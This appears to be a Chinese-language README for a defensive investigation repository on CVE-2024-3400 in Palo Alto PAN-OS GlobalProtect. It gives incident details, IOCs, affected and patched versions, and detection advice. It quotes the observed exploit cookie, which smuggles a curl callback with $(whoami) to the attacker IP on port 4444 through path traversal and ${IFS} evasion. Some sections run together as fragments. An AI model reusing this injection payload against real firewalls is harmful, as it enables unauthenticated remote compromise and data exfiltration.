针对 Palo Alto PAN-OS GlobalProtect 门户的 CVE-2024-3400 漏洞利用尝试的检测、分析与响应策略。包含 IOC、漏洞利用模式及缓解指南。
针对 Palo Alto PAN-OS GlobalProtect 门户的 CVE-2024-3400 利用尝试的检测、分析与响应策略。包含 IOC、利用模式及缓解指南。
本仓库包含对 CVE-2024-3400 的详细调查与威胁分析。CVE-2024-3400 是一个影响 Palo Alto Networks PAN-OS 软件、专门针对 GlobalProtect 门户的严重未授权命令注入漏洞。
2024 年 4 月 18 日,在一台内部 PAN-OS 防火墙上检测到针对易受攻击的 /global-protect/login.esp 端点的利用活动。攻击者使用一个经过精心构造的 SESSID cookie,其中包含通过反引号执行的 curl 命令,以访问托管在 144.172.79.92(佛罗里达州迈阿密)的远程 C2 服务器。该利用载荷利用 ${IFS} 绕过简单的过滤器,并利用 PAN-OS 的遥测目录来暂存恶意活动。防火墙返回 200 OK,表明该载荷很可能已成功执行。

事件 ID:249
检测规则:SOC274 – PAN-OS 命令注入利用
事件时间:2024 年 4 月 18 日 03:09 UTC
主机名:PA-Firewall-01
目标 IP:172.16.17.139
源 IP:144.172.79.92
请求方法:POST
端点:/global-protect/login.esp
Cookie 载荷:SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaacurl${IFS}144.172.79.92:4444?user=$(whoami)
恶意哈希:
SHA256:3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
MD5:0c1554888ce9ed0da1583dbdf7b31651
恶意脚本:update.py(使用 执行)





SESSID 进行命令注入${IFS} 进行规避/opt/panlogs/tmp/device_telemetry 中暂存载荷dt_send 进程4444 端口发起网络回调


10.2.9-h1、11.0.4-h1 或 11.1.2-h3144.172.79.92logs/:解析后的及原始检测日志ioc/:与攻击相关的文件哈希和 IPanalysis/:深入分析利用行为与进程追踪report/:我的调查日志和代码的摘要与图像CVE-2024-3400 是指 Palo Alto Networks PAN-OS 中的一个严重漏洞,专门影响 GlobalProtect 网关。以下是关于该漏洞的公开已知信息梳理:
CVSS 评分:10.0(严重)
发布时间:2024 年 4 月
受影响产品:启用 GlobalProtect 时的 PAN-OS 10.2、11.0 和 11.1。
利用情况:已在野外得到确认(零日漏洞)
漏洞类型:未授权命令注入
CVE-2024-3400 允许未授权攻击者在防火墙操作系统上执行任意命令。这实际上使攻击者无需凭据即可完全控制受影响的设备——对于任何依赖 Palo Alto 防火墙的企业来说,这都是一个严重的突破口。
必须启用 GlobalProtect 网关。
特定的 PAN-OS 版本(10.2.x、11.0.x、11.1.x)。
如果未处于额外的安全防护层之后,可通过互联网利用。
发送特制请求以利用注入缺陷。
部署远程 shell 或下载第二阶段载荷。
已观察到的行为包括:
通过特制 URL 执行命令
持久化机制
网络内部的横向移动
立即修补:Palo Alto 已发布修复程序;请升级到不受影响的版本(例如 10.2.9-h1、11.0.4-h1、11.1.2-h3 或更高版本)。
检查失陷指标 (IOC),例如可疑进程、出站连接或异常的 CLI 历史记录。
使用 Shodan 或资产清单等工具来查找易受攻击的设备。
查找未经过有效身份验证就访问 GlobalProtect 的外部 IP。
检查日志中是否存在可疑的命令执行(show system processes、cat /etc/passwd 等)。
监控防火墙行为,并对异常的出站连接发出告警。
本仓库既可作为内部调查报告,也可作为防御者了解 PAN-OS 漏洞真实世界利用情况的教育资源。欢迎贡献和补充观察。
/usr/bin/python3